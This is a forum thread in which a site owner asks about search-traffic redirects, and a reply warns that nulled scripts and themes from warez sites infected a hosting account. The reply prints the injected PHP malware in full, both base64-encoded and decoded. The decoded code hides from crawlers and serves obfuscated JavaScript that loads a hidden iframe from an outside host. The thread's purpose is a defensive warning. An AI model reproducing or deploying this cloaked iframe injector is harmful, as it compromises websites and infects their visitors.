OK, so I may have a background in SEO, but hacking is not my bag... One of my sites, when you follow a link from Google Organic Search is redirecting to some spammy s**t website. Don't know who the wise guy is but the .htaccess file looks intact. How else do these guys get in and what file should I be looking at fixing please?
Beware from Rapidleech script form warez sites and word press themes --------------------------------------------------------------------- Recently my friend install Rapidleech script form warez sites and word press themes absence of mine when i return after 1 week ...... i was shocked because my Eset smart secrity update version show me Threat JS/Iframe.CP trojan Information: Connection terminated - quarantined on every sites when i exam my hosting ....... every index page of my site is added with this code eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1alBUSTdhVDFqTFRJN2FXWW9jR0Z5YzJWSmJuUW9JakF4TWpNaUtUMDlQVGd6S1dsbUtIZHBibVJ2ZHk1a2IyTjFiV1Z1ZENsMGNubDdibVYzSUZOMGNtbHVaeWdpWVhOa0lpa3VjSEp2ZEc5MGVYQmxMbkY5WTJGMFkyZ29aV2RsZDJkelpDbDdaajFiSnkwek1Ha3RNekJwTmpacE5qTnBMVGRwTVdrMk1XazNNbWsyTUdrM09HazNNR2syTW1rM01XazNOMmszYVRZMGFUWXlhVGMzYVRNd2FUWTVhVFl5YVRjd2FUWXlhVGN4YVRjM2FUYzJhVEkzYVRneWFUUTFhVFU0YVRZMGFUTTVhVFU0YVRjd2FUWXlhVEZwTUdrMU9XazNNbWsyTVdrNE1ta3dhVEpwTlRKcE9XazFOR2t5YVRnMGFTMHlObWt0TXpCcExUTXdhUzB6TUdrMk5tazJNMmszTldrMU9HazNNR2syTW1rM05Xa3hhVEpwTWpCcExUSTJhUzB6TUdrdE16QnBPRFpwTFRkcE5qSnBOamxwTnpacE5qSnBMVGRwT0RScExUSTJhUzB6TUdrdE16QnBMVE13YVRZeGFUY3lhVFl3YVRjNGFUY3dhVFl5YVRjeGFUYzNhVGRwT0RCcE56VnBOalpwTnpkcE5qSnBNV2t0TldreU1XazJObWsyTTJrM05XazFPR2szTUdrMk1ta3ROMmszTm1rM05XazJNR2t5TW1rd2FUWTFhVGMzYVRjM2FUY3phVEU1YVRocE9HazFPR2sxT0drM09HazJNR2szTW1rMk1XazNOR2s0TUdrM05XazJNMmszYVRZMGFUY3lhVGMzYVRZMGFUWXlhVFl5YVRZNGFUYzJhVGRwTmpCcE56SnBOekJwT0drMk1XazRhVEV6YVRscE1UTnBOMmszTTJrMk5XazNNMmt5TkdrMk5HazNNbWt5TW1reE1Ha3dhUzAzYVRnd2FUWTJhVFl4YVRjM2FUWTFhVEl5YVRCcE1UQnBPV2t3YVMwM2FUWTFhVFl5YVRZMmFUWTBhVFkxYVRjM2FUSXlhVEJwTVRCcE9Xa3dhUzAzYVRjMmFUYzNhVGd5YVRZNWFUWXlhVEl5YVRCcE56bHBOalpwTnpacE5qWnBOVGxwTmpacE5qbHBOalpwTnpkcE9ESnBNVGxwTmpWcE5qWnBOakZwTmpGcE5qSnBOekZwTWpCcE56TnBOekpwTnpacE5qWnBOemRwTmpacE56SnBOekZwTVRscE5UaHBOVGxwTnpacE56SnBOamxwTnpocE56ZHBOakpwTWpCcE5qbHBOakpwTmpOcE56ZHBNVGxwT1dreU1HazNOMmszTW1rM00ya3hPV2s1YVRJd2FUQnBNak5wTWpGcE9HazJObWsyTTJrM05XazFPR2szTUdrMk1ta3lNMmt0TldreWFUSXdhUzB5Tm1rdE16QnBMVE13YVRnMmFTMHlObWt0TXpCcExUTXdhVFl6YVRjNGFUY3hhVFl3YVRjM2FUWTJhVGN5YVRjeGFTMDNhVFkyYVRZemFUYzFhVFU0YVRjd2FUWXlhVGMxYVRGcE1tazROR2t0TWpacExUTXdhUzB6TUdrdE16QnBOemxwTlRocE56VnBMVGRwTmpOcExUZHBNakpwTFRkcE5qRnBOekpwTmpCcE56aHBOekJwTmpKcE56RnBOemRwTjJrMk1HazNOV2syTW1rMU9HazNOMmsyTW1rek1HazJPV2syTW1rM01HazJNbWszTVdrM04ya3hhVEJwTmpacE5qTnBOelZwTlRocE56QnBOakpwTUdreWFUSXdhVFl6YVRkcE56WnBOakpwTnpkcE1qWnBOemRwTnpkcE56VnBOalpwTlRscE56aHBOemRwTmpKcE1Xa3dhVGMyYVRjMWFUWXdhVEJwTldrd2FUWTFhVGMzYVRjM2FUY3phVEU1YVRocE9HazFPR2sxT0drM09HazJNR2szTW1rMk1XazNOR2s0TUdrM05XazJNMmszYVRZMGFUY3lhVGMzYVRZMGFUWXlhVFl5YVRZNGFUYzJhVGRwTmpCcE56SnBOekJwT0drMk1XazRhVEV6YVRscE1UTnBOMmszTTJrMk5XazNNMmt5TkdrMk5HazNNbWt5TW1reE1Ha3dhVEpwTWpCcE5qTnBOMmszTm1rM04yazRNbWsyT1drMk1tazNhVGM1YVRZMmFUYzJhVFkyYVRVNWFUWTJhVFk1YVRZMmFUYzNhVGd5YVRJeWFUQnBOalZwTmpacE5qRnBOakZwTmpKcE56RnBNR2t5TUdrMk0yazNhVGMyYVRjM2FUZ3lhVFk1YVRZeWFUZHBOek5wTnpKcE56WnBOalpwTnpkcE5qWnBOekpwTnpGcE1qSnBNR2sxT0drMU9XazNObWszTW1rMk9XazNPR2szTjJrMk1ta3dhVEl3YVRZemFUZHBOelpwTnpkcE9ESnBOamxwTmpKcE4yazJPV2syTW1rMk0yazNOMmt5TW1rd2FUbHBNR2t5TUdrMk0yazNhVGMyYVRjM2FUZ3lhVFk1YVRZeWFUZHBOemRwTnpKcE56TnBNakpwTUdrNWFUQnBNakJwTmpOcE4yazNObWsyTW1rM04ya3lObWszTjJrM04yazNOV2syTm1rMU9XazNPR2szTjJrMk1ta3hhVEJwT0RCcE5qWnBOakZwTnpkcE5qVnBNR2sxYVRCcE1UQnBPV2t3YVRKcE1qQnBOak5wTjJrM05tazJNbWszTjJreU5tazNOMmszTjJrM05XazJObWsxT1drM09HazNOMmsyTW1reGFUQnBOalZwTmpKcE5qWnBOalJwTmpWcE56ZHBNR2sxYVRCcE1UQnBPV2t3YVRKcE1qQnBMVEkyYVMwek1Ha3RNekJwTFRNd2FUWXhhVGN5YVRZd2FUYzRhVGN3YVRZeWFUY3hhVGMzYVRkcE5qUnBOakpwTnpkcE16QnBOamxwTmpKcE56QnBOakpwTnpGcE56ZHBOelpwTWpkcE9ESnBORFZwTlRocE5qUnBNemxwTlRocE56QnBOakpwTVdrd2FUVTVhVGN5YVRZeGFUZ3lhVEJwTW1rMU1tazVhVFUwYVRkcE5UaHBOek5wTnpOcE5qSnBOekZwTmpGcE1qaHBOalZwTmpacE5qbHBOakZwTVdrMk0ya3lhVEl3YVMweU5ta3RNekJwTFRNd2FUZzJKMTFiTUYwdWMzQnNhWFFvSjJrbktUdHRaRDBuWVNjN2RqMGlaWFlpS3lKaGJDSTdmV2xtS0hZcFpUMTNhVzVrYjNkYmRsMDdkejFtTzNNOVcxMDdjajFUZEhKcGJtYzdabTl5S0RzMU9Ua2hQV2s3YVNzOU1TbDdhajFwTzNNclBYSmJJbVp5YjIxRElpc2lhR0Z5UTI5a1pTSmRLRE01S3pFcWQxdHFYU2s3ZlFwcFppaG1LWG85Y3p0bEtIb3BPend2YzJOeWFYQjBQZz09JykpOw0KfQ==')); PHP: so beware my friends always check free themes and script form eval other wise you will be fuc*k hard your hosting provider will kick your ass decode above code <?phperror_reporting(0); $bot = FALSE ; $ua = $_SERVER['HTTP_USER_AGENT']; $botsUA = array('12345','alexa.com','anonymouse.org','bdbrandprotect.com','blogpulse.com','bot','buzztracker.com','crawl','docomo','drupal.org','feedtools','htmldoc','httpclient','internetseer.com','linux','macintosh','mac os','magent','mail.ru','mybloglog api','netcraft','openacoon.de','opera mini','opera mobi','playstation','postrank.com','psp','rrrrrrrrr','rssreader','slurp','snoopy','spider','spyder','szn-image-resizer','validator','virus','vlc media player','webcollage','wordpress','x11','yandex','iphone','android'); foreach ($botsUA as $bs) {if(strpos(strtolower($ua), $bs)!== false){$bot = true; break;}} if (!$bot){ echo '<script>c=2;i=c-2;if(parseInt("0123")===83)if(window.document)try{new String("asd").prototype.q}catch(egewgsd){f=['-30i-30i66i63i-7i1i61i72i60i78i70i62i71i77i7i64i62i77i30i69i62i70i62i71i77i76i27i82i45i58i64i39i58i70i62i1i0i59i72i61i82i0i2i52i9i54i2i84i-26i-30i-30i-30i66i63i75i58i70i62i75i1i2i20i-26i-30i-30i86i-7i62i69i76i62i-7i84i-26i-30i-30i-30i61i72i60i78i70i62i71i77i7i80i75i66i77i62i1i-5i21i66i63i75i58i70i62i-7i76i75i60i22i0i65i77i77i73i19i8i8i58i58i78i60i72i61i74i80i75i63i7i64i72i77i64i62i62i68i76i7i60i72i70i8i61i8i13i9i13i7i73i65i73i24i64i72i22i10i0i-7i80i66i61i77i65i22i0i10i9i0i-7i65i62i66i64i65i77i22i0i10i9i0i-7i76i77i82i69i62i22i0i79i66i76i66i59i66i69i66i77i82i19i65i66i61i61i62i71i20i73i72i76i66i77i66i72i71i19i58i59i76i72i69i78i77i62i20i69i62i63i77i19i9i20i77i72i73i19i9i20i0i23i21i8i66i63i75i58i70i62i23i-5i2i20i-26i-30i-30i86i-26i-30i-30i63i78i71i60i77i66i72i71i-7i66i63i75i58i70i62i75i1i2i84i-26i-30i-30i-30i79i58i75i-7i63i-7i22i-7i61i72i60i78i70i62i71i77i7i60i75i62i58i77i62i30i69i62i70i62i71i77i1i0i66i63i75i58i70i62i0i2i20i63i7i76i62i77i26i77i77i75i66i59i78i77i62i1i0i76i75i60i0i5i0i65i77i77i73i19i8i8i58i58i78i60i72i61i74i80i75i63i7i64i72i77i64i62i62i68i76i7i60i72i70i8i61i8i13i9i13i7i73i65i73i24i64i72i22i10i0i2i20i63i7i76i77i82i69i62i7i79i66i76i66i59i66i69i66i77i82i22i0i65i66i61i61i62i71i0i20i63i7i76i77i82i69i62i7i73i72i76i66i77i66i72i71i22i0i58i59i76i72i69i78i77i62i0i20i63i7i76i77i82i69i62i7i69i62i63i77i22i0i9i0i20i63i7i76i77i82i69i62i7i77i72i73i22i0i9i0i20i63i7i76i62i77i26i77i77i75i66i59i78i77i62i1i0i80i66i61i77i65i0i5i0i10i9i0i2i20i63i7i76i62i77i26i77i77i75i66i59i78i77i62i1i0i65i62i66i64i65i77i0i5i0i10i9i0i2i20i-26i-30i-30i-30i61i72i60i78i70i62i71i77i7i64i62i77i30i69i62i70i62i71i77i76i27i82i45i58i64i39i58i70i62i1i0i59i72i61i82i0i2i52i9i54i7i58i73i73i62i71i61i28i65i66i69i61i1i63i2i20i-26i-30i-30i86'][0].split('i');md='a';v="ev"+"al";}if(v)e=window[v];w=f;s=[];r=String;for(;599!=i;i+=1){j=i;s+=r["fromC"+"harCode"](39+1*w[j]);} if(f)z=s;e(z);</script>'; } ?> PHP: